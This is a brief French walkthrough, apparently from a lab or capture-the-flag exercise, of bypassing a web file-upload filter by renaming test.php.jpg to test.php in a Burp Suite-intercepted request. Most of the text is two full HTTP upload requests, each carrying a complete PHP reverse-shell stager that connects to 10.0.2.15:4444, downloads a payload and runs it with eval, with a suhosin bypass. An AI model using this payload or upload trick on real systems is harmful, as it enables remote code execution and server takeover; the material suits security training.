Etape 1:

Creer un fichier test.php.jpg

Etape2:
Avec burpsuite, intercepter la requete, changer uniquement le filename et enlever l'extention jpg:
So Easy !

Original request:

POST /index.php?page=upload HTTP/1.1
Host: localhost:8042
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8042/index.php?page=upload
Content-Type: multipart/form-data; boundary=---------------------------120521787015560711891731003545
Content-Length: 1579
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------120521787015560711891731003545
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------120521787015560711891731003545
Content-Disposition: form-data; name="uploaded"; filename="test.php.jpg"
Content-Type: image/jpeg

<?php /**/ error_reporting(0); $ip = '10.0.2.15'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------120521787015560711891731003545
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------120521787015560711891731003545--





Edited Request:

POST /index.php?page=upload HTTP/1.1
Host: localhost:8042
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8042/index.php?page=upload
Content-Type: multipart/form-data; boundary=---------------------------120521787015560711891731003545
Content-Length: 1575
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------120521787015560711891731003545
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------120521787015560711891731003545
Content-Disposition: form-data; name="uploaded"; filename="test.php"
Content-Type: image/jpeg

<?php /**/ error_reporting(0); $ip = '10.0.2.15'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------120521787015560711891731003545
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------120521787015560711891731003545--

